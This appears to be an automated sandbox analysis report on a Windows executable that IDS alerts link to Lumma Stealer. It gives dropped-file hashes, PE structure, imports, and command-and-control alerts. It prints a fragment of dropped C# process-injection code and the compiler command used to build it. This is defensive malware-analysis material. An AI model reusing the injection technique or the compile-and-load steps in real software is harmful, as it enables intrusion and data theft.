	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	104.21.4.136 188.114.97.3 172.67.162.108 188.114.96.3 104.102.49.254 104.21.2.13 104.21.83.105 172.67.208.139

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:NlllulBkXj:NllUS
MD5:	453075887941F85A80949CDBA8D49A8B
SHA1:	7B31CA484A80AA32BCC06FC3511547BCB1413826
SHA-256:	84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
SHA-512:	02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\RESD8A4.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Sep 26 20:35:53 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.9950936329039313
Encrypted:	false
SSDEEP:	24:H3e9E2+f1SWQqXDfHcwKEbsmfII+ycuZhN/lakS+KPNnqSqd:JMW/zDKPmg1ul/la3+mqSK
MD5:	2789BE71A2DA444B0133188951C83EA9
SHA1:	6CE41537DE23FF89C0D835FAA4539FE818ED616F
SHA-256:	7C985328A9F6DCA5B589664C1CCBA6FE665A7A8C7134BC5CBDCB7F094EB7223C
SHA-512:	0DB255C709C5B8CB100415DEEFFCE5D0584561AE0FB198065E33A049A344B80CE97EE3E48BAAF513581FEDA284D45DD4C00C101C398BBDD4EAE219BB6E5E0E0F
Malicious:	false
Reputation:	low
Preview:	L......f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\uy2pimwz\CSCE5E1F75A70734430B929D7B25FACB84F.TMP...................^_.. l.gY.Z...........4.......C:\Users\user\AppData\Local\Temp\RESD8A4.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.y.2.p.i.m.w.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_353e4xkt.405.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw4gxtga.n3x.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\uy2pimwz\CSCE5E1F75A70734430B929D7B25FACB84F.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.113772263902778
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry4Slak7YnqqbSKPN5Dlq5J:+RI+ycuZhN/lakS+KPNnqX
MD5:	C00707EA5E5FD4E1206C046759B35AE5
SHA1:	32EE950C4CE6285107FEE802636DB3B28C69DA46
SHA-256:	7B21687E419B82B5B705E84FB969C319580141C619A38B3C44053B7C9C1ABCA6
SHA-512:	2514F31B99DD46971F7EA7142994CB7DF6AA13DF77AB5414692D079F56CE2A04AF21F5C33560EF08EEDEA26ED6C1534E0FB7619CB333A4A128306C504813F585
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.y.2.p.i.m.w.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.y.2.p.i.m.w.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	10564
Entropy (8bit):	4.490758132847389
Encrypted:	false
SSDEEP:	192:fC2oTLpQgzLYK3BwMk2kvB/qopu/huvniHzrEx:QDLYWB+B/qopgkvifM
MD5:	E59293D0F6BF5383CC31D426008D2D71
SHA1:	E9CE204DED23AAED8D765BB3BF9F0D39CCD50907
SHA-256:	405009BC011B8DA75A8FBC84F90BF1033B83DE3B3E5C7FC636154F78C30E79DC
SHA-512:	D3BC636C4CEBE3CF0EB7470AEEAEBF0683293E42B90DA97A452A5CD901B1D389B78A45149D5B6A2E0DDB4A1EA639D050D0A6F2AE18934DDC176F9B02395A1851
Malicious:	true
Preview:	.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class HamerPush..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	204
Entropy (8bit):	5.025036167938484
Encrypted:	false
SSDEEP:	6:pAu+H2L/6K2wkn23ftQJFzxszIwkn23ftQJA:p37L/6KRf1mFQf1mA
MD5:	A15FEF3E66ABBDFE09B13C63B5C3EDAE
SHA1:	17A7AF25ACB9B2B178D09950092B606C9EE49E5E
SHA-256:	BA4B3A7E6E717B0024071AE7C4FB2F7E830867BF58D729BC820FDBBEBFB0345D
SHA-512:	DB55EA3EBF16CA22C15962C73F9F8493BE000931A5EF05530D9BBBAB16229B70C2C9D429699EF7A73D9D1F8CB96917EA658E430A558BD4F8B5FA7AEB44D9BF13
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.0.cs"

C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	4.662561775425755
Encrypted:	false
SSDEEP:	192:qWaQcf9OQFFxBaaX6mtOl+RjdaiUx15MqMeNc+:6VvFOl+9drK5Mqfy+
MD5:	B1A60EED8DCCE4052A023BEAB3CE96F4
SHA1:	922C389A5C0212EE1184F1EE52881EB8997D953B
SHA-256:	A517729E15784C55BF31BF09085CB6A32453961DE0B030BF6032EF52CDF105AE
SHA-512:	FF6E5DC4510B66F22C9120F18D1F20108272782CE9A32C701A2B6BDF2EFDC675E8B58C5A27730EA4935604FC7957A5978D285983ACDAB0F14706B9D7D723EE9D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......`%.. ..........................................................."..(...."..(......(.......0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p.....(......(.........(....(.........*....0..#........g...+E......YE....................YE............+....+....,..J.+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(...... ..

C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	702
Entropy (8bit):	5.250938438794914
Encrypted:	false
SSDEEP:	12:KJN/qR37L/6KRf1mFQf1m1KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRf13f1EKax5DqBVKVrdFAMBt
MD5:	C4E720EE57AB80E062CC30F281E60645
SHA1:	CDC6AFA8EC48D30A16A7C6283367F1B70890B71C
SHA-256:	40E748BC939EB8EE36D0BEA8855D2B3B1986C28CBD5F5DEC24AC903234F2B0B0
SHA-512:	94407A65231BDDC6245B060FB90298B5883D394390E220815B1AA620BFE5EA57C096E074268D4E82DB3CDD848DA975806AD8FBC5E0860D8D268CACFC6A60F3B8
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.553969864328025
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.62% Win32 Executable (generic) a (10002005/4) 49.57% Windows ActiveX control (116523/4) 0.58% Win32 EXE PECompact compressed (generic) (41571/9) 0.21% Generic Win/DOS Executable (2004/3) 0.01%
File name:	file.exe
File size:	11'134'263 bytes
MD5:	a2b2889063a7a3f9785253f937ee6fe4
SHA1:	f3499e38acaf1837c7b3d7289dd6627f5f7b3e3f
SHA256:	e2a2430866d3186a75e84da8443e4b306aaa91527e4e8856c1a7f7e217aade81
SHA512:	99e76ea00774cbf3cb0c3869d9dba1a2d9700052955c7a96808d22a3104e0014f34b1d7e2a174cce844df7037fadd2e1c7d8d595d0edb7bf3ef76429061055d5
SSDEEP:	196608:MqlTl1VkwhYYQtjMfgkqixuPZfbaKMlaE+GVaCUGhZPRU74fk7:MWl164YP8dHnhHU74G
TLSH:	96B6BF30B38AC536D9960670893DABEF217DBE361B2551CBB2D46D2D18712D32732E63
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q.X.?.X.?.X.?.Q...N.?.M.;.K.?.M.<.E.?.M.:...?...;.P.?...>.U.?.X.>...?.`.<._.?.`.6...?.`.?.Y.?.`...Y.?.`.=.Y.?.RichX.?........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8fa050
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6541164A [Tue Oct 31 14:59:22 2023 UTC]
TLS Callbacks:	0x8f9580, 0x8f9d00
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	df453def9d4f8f1453a5fa51c6608cfc

Entrypoint Preview

Instruction
call 00007FC8846752DBh
jmp 00007FC884674C8Dh
push ebp
mov ebp, esp
push FFFFFFFFh
push 00951389h
mov eax, dword ptr fs:[00000000h]
push eax
push ecx
push ebx
push esi
push edi
mov eax, dword ptr [00A93024h]
xor eax, ebp
push eax
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp+08h]
and dword ptr [ebp-04h], 00000000h
call 00007FC8843DA116h
pop ecx
jmp 00007FC884674E2Ah
mov eax, 008FA098h
ret
xor eax, eax
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop esi
pop ebx
leave
ret
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
pop ebp
jmp 00007FC884674DC7h
int3
int3
int3
int3
int3
int3
int3
int3
push 008FAFA0h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [00A93024h]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
push ebp
mov ebp, esp
and dword ptr [00A9A570h], 00000000h
sub esp, 24h
or dword ptr [00A93030h], 00000000h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x68fc80	0xc4	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x68fd44	0x168	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6b9000	0x135ae0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7ef000	0x4190c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x625020	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x625080	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5587a0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x553000	0x71c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x68fb78	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x55090a	0x550a00	7ad59dcf80afcba46bb6779381710378	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.CLR_UEF	0x552000	0x44	0x200	57bc74edcae15b11802d7ff93d25b76a	False	0.134765625	data	0.9617583915731932	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x553000	0x13f3ee	0x13f400	a81cb89e48fc1a139c5bd873361779e1	False	0.36891426438919345	data	5.127114912928156	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x693000	0x13cbc	0x7200	de56a7c6ce98efdc83b117499fe01471	False	0.25894325657894735	Matlab v4 mat-file (little endian) \377\377\377\377, numeric, rows 0, columns 0	3.871267878495484	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x6a7000	0x1c	0x200	f0474f498313864f0bedb9bb443e88cf	False	0.056640625	data	0.2495917193956308	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA	0x6a8000	0x10f10	0x11000	211089d7d672e1712b48c26d0bdc0a1b	False	0.16291360294117646	data	5.364619170209927	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x6b9000	0x135ae0	0x135c00	f85f1a44b15ec14b00dc9c23402fe665	False	0.4053065413135593	data	6.395532456097255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7ef000	0x4190c	0x41a00	0bda70936ae3f88b8b17230bf231d2d3	False	0.5916517857142857	data	6.6691672686825445	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_RCDATA	0x6b918c	0x24	data	1.1666666666666667
RT_RCDATA	0x6b91b0	0x24	data	1.1666666666666667
RT_RCDATA	0x6b91d4	0x135410	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	0.41274356842041016
RT_VERSION	0x7ee5e4	0x2c0	data	0.4289772727272727
RT_MANIFEST	0x7ee8a4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
KERNEL32.dll	RaiseException, FreeLibrary, SetErrorMode, RaiseFailFastException, GetExitCodeProcess, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, AddVectoredExceptionHandler, MultiByteToWideChar, GetTickCount, FlushInstructionCache, QueryPerformanceFrequency, QueryPerformanceCounter, InterlockedPushEntrySList, InterlockedFlushSList, InitializeSListHead, GetTickCount64, DuplicateHandle, QueueUserAPC, WaitForSingleObjectEx, SetThreadPriority, GetThreadPriority, GetCurrentThreadId, TlsAlloc, GetCurrentThread, GetCurrentProcessId, CreateThread, GetModuleHandleW, WaitForMultipleObjectsEx, SignalObjectAndWait, SetThreadStackGuarantee, VirtualQuery, WriteFile, GetStdHandle, GetConsoleOutputCP, MapViewOfFileEx, UnmapViewOfFile, GetStringTypeExW, InterlockedPopEntrySList, ExitProcess, Sleep, CreateMemoryResourceNotification, VirtualAlloc, VirtualFree, VirtualProtect, SleepEx, SwitchToThread, SuspendThread, ResumeThread, CloseThreadpoolTimer, CreateThreadpoolTimer, SetThreadpoolTimer, ReadFile, GetFileSize, GetEnvironmentVariableW, SetEnvironmentVariableW, CreateEventW, SetEvent, ResetEvent, GetThreadContext, SetThreadContext, GetEnabledXStateFeatures, InitializeContext, CopyContext, SetXStateFeaturesMask, WerRegisterRuntimeExceptionModule, GetSystemDefaultLCID, GetUserDefaultLCID, OutputDebugStringA, RtlUnwind, HeapAlloc, HeapFree, GetProcessHeap, CloseHandle, HeapDestroy, GetEnvironmentStringsW, FreeEnvironmentStringsW, FormatMessageW, CreateSemaphoreExW, ReleaseSemaphore, GetACP, LCMapStringEx, LocalFree, VerSetConditionMask, VerifyVersionInfoW, IsWow64Process, QueryThreadCycleTime, SetThreadGroupAffinity, GetProcessAffinityMask, QueryInformationJobObject, GetSystemTimeAsFileTime, GetModuleFileNameW, CreateProcessW, GetCPInfo, GetTempPathW, LoadLibraryExW, CreateFileW, GetFileAttributesExW, GetFullPathNameW, LoadLibraryExA, OpenEventW, ReleaseMutex, ExitThread, CreateMutexW, HeapReAlloc, CreateNamedPipeA, WaitForMultipleObjects, DisconnectNamedPipe, CreateFileA, CancelIoEx, GetOverlappedResult, ConnectNamedPipe, FlushFileBuffers, SetFilePointer, CreateFileMappingW, MapViewOfFile, GetActiveProcessorGroupCount, GetCurrentProcessorNumberEx, GetSystemTime, SetConsoleCtrlHandler, GetLocaleInfoEx, GetUserDefaultLocaleName, LoadLibraryW, CreateDirectoryW, RemoveDirectoryW, CreateActCtxW, ActivateActCtx, FindResourceW, GetWindowsDirectoryW, GetFileSizeEx, FindFirstFileExW, FindNextFileW, FindClose, LoadLibraryA, GetCurrentDirectoryW, EncodePointer, DecodePointer, GetNumaHighestNodeNumber, TlsSetValue, TlsGetValue, GetSystemInfo, GetCurrentProcess, ReadProcessMemory, OutputDebugStringW, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GetCommandLineW, GetProcAddress, GetModuleHandleExW, SetThreadErrorMode, FlushProcessWriteBuffers, SetLastError, DebugBreak, GetLastError, WaitForSingleObject, SetThreadAffinityMask, SetThreadIdealProcessorEx, HeapCreate, WideCharToMultiByte, GetThreadIdealProcessorEx, VirtualAllocExNuma, GetNumaProcessorNodeEx, VirtualUnlock, GetWriteWatch, GetLargePageMinimum, ResetWriteWatch, IsProcessInJob, K32GetProcessMemoryInfo, GetLogicalProcessorInformation, GlobalMemoryStatusEx, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, TlsFree, InitializeConditionVariable, WakeConditionVariable, TryAcquireSRWLockExclusive, GetExitCodeThread, GetStringTypeW, InitializeCriticalSectionEx, CreateFileMappingA
ADVAPI32.dll	AdjustTokenPrivileges, RegGetValueW, SetKernelObjectSecurity, GetSidSubAuthorityCount, GetSidSubAuthority, GetTokenInformation, OpenProcessToken, DeregisterEventSource, ReportEventW, RegisterEventSourceW, RegQueryValueExW, RegOpenKeyExW, RegCloseKey, EventRegister, SetThreadToken, RevertToSelf, OpenThreadToken, EventWriteTransfer, EventWrite, LookupPrivilegeValueW
ole32.dll	CoTaskMemFree, CoReleaseMarshalData, CoRegisterInitializeSpy, CoGetMarshalSizeMax, CoMarshalInterface, CoUnmarshalInterface, CoTaskMemAlloc, CoGetContextToken, CoGetClassObject, CoCreateFreeThreadedMarshaler, CreateStreamOnHGlobal, CoRevokeInitializeSpy, CoCreateGuid, CoWaitForMultipleHandles, CoUninitialize, CoGetObjectContext, CoInitializeEx, CLSIDFromProgID
OLEAUT32.dll	SysFreeString, GetErrorInfo, SetErrorInfo, SysStringLen, CreateErrorInfo, LoadRegTypeLib, SafeArrayPutElement, SafeArrayCreateVector, SysAllocStringByteLen, SysStringByteLen, SafeArrayGetElemsize, SafeArrayAllocData, SysAllocString, SafeArraySetRecordInfo, GetRecordInfoFromTypeInfo, SysAllocStringLen, SafeArrayAllocDescriptorEx, VarCyFromDec, VariantInit, VariantClear, VariantChangeTypeEx, VariantChangeType, SafeArrayGetVartype, LoadTypeLibEx, QueryPathOfRegTypeLib, SafeArrayDestroy, SafeArrayGetLBound, SafeArrayGetDim
USER32.dll	LoadStringW, MessageBoxW
SHELL32.dll	ShellExecuteW
api-ms-win-crt-string-l1-1-0.dll	strlen, strncmp, wcscpy_s, wcsncpy_s, _strdup, _wcsicmp, strncpy, isspace, strtok_s, strcpy_s, strcat_s, strncpy_s, _strnicmp, toupper, iswupper, _wcsnicmp, tolower, wcsncmp, isalpha, isdigit, wcscat_s, isupper, wcstok_s, strnlen, _wcsdup, wcsnlen, islower, _stricmp, strcspn, __strncnt, iswspace, strncat_s, towupper, towlower, wcsncat_s, iswascii, strcmp
api-ms-win-crt-stdio-l1-1-0.dll	fgetc, _wfsopen, fread, __stdio_common_vsnwprintf_s, _fseeki64, _get_stream_buffer_pointers, fputwc, fputws, __stdio_common_vfwprintf, fgetpos, __p__commode, setvbuf, fputs, __stdio_common_vsnprintf_s, fopen, ungetc, _setmode, _set_fmode, __stdio_common_vswprintf, __stdio_common_vsscanf, fgets, _wfopen, fclose, _dup, _fileno, ftell, fseek, fwrite, __stdio_common_vfprintf, _flushall, fflush, __acrt_iob_func, fputc, __stdio_common_vsprintf_s, fsetpos
api-ms-win-crt-runtime-l1-1-0.dll	_initialize_onexit_table, _register_onexit_function, _crt_atexit, _cexit, _seh_filter_exe, _set_app_type, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment, _initterm, _initterm_e, _exit, _invalid_parameter_noinfo, __p___argc, __p___wargv, _c_exit, _register_thread_local_exe_atexit_callback, _controlfp_s, _invalid_parameter_noinfo_noreturn, _beginthreadex, _wcserror_s, terminate, abort, exit, _errno
api-ms-win-crt-convert-l1-1-0.dll	atoi, atol, _ltow_s, _wtoi, _wcstoui64, wcstoul, strtoul, strtoull, _itow_s
api-ms-win-crt-heap-l1-1-0.dll	calloc, _set_new_mode, realloc, free, malloc
api-ms-win-crt-utility-l1-1-0.dll	qsort
api-ms-win-crt-math-l1-1-0.dll	_libm_sse2_asin_precise, _libm_sse2_atan_precise, _libm_sse2_cos_precise, _isnan, _libm_sse2_acos_precise, __libm_sse2_tan, __libm_sse2_sin, __libm_sse2_pow, __libm_sse2_log10, _fdopen, __libm_sse2_log, __libm_sse2_exp, trunc, _libm_sse2_exp_precise, ilogb, ilogbf, _finite, __libm_sse2_cos, __libm_sse2_atan2, __libm_sse2_atan, __libm_sse2_asin, _libm_sse2_log10_precise, frexp, log2f, acoshf, __libm_sse2_acos, _CItanh, _CIsinh, cbrtf, atanhf, _CIfmod, _CIcosh, _CIatan2, asinhf, asinh, cbrt, acosh, atanh, log2, _libm_sse2_log_precise, _libm_sse2_pow_precise, _libm_sse2_sin_precise, _libm_sse2_sqrt_precise, modf, _copysign, _libm_sse2_tan_precise, ceil, floor, fma, fmaf, truncf, __setusermatherr
api-ms-win-crt-time-l1-1-0.dll	wcsftime, _gmtime64_s, _time64
api-ms-win-crt-environment-l1-1-0.dll	getenv
api-ms-win-crt-locale-l1-1-0.dll	___mb_cur_max_func, __pctype_func, _unlock_locales, _lock_locales, ___lc_codepage_func, ___lc_locale_name_func, localeconv, setlocale, _configthreadlocale
api-ms-win-crt-filesystem-l1-1-0.dll	_wremove, _unlock_file, _wrename, _lock_file

Exports

Name	Ordinal	Address
CLRJitAttachState	3	0xa9ff48
DotNetRuntimeInfo	4	0xa945f0
MetaDataGetDispenser	5	0x8a96c0
g_CLREngineMetrics	2	0xa94068
g_dacTable	6	0x96b2e0

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T21:06:08.098499+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49731	104.21.83.105	443	TCP
2024-09-26T21:06:08.098499+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.83.105	443	TCP
2024-09-26T21:06:08.104172+0200	2056164	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)	1	192.168.2.4	57092	1.1.1.1	53	UDP
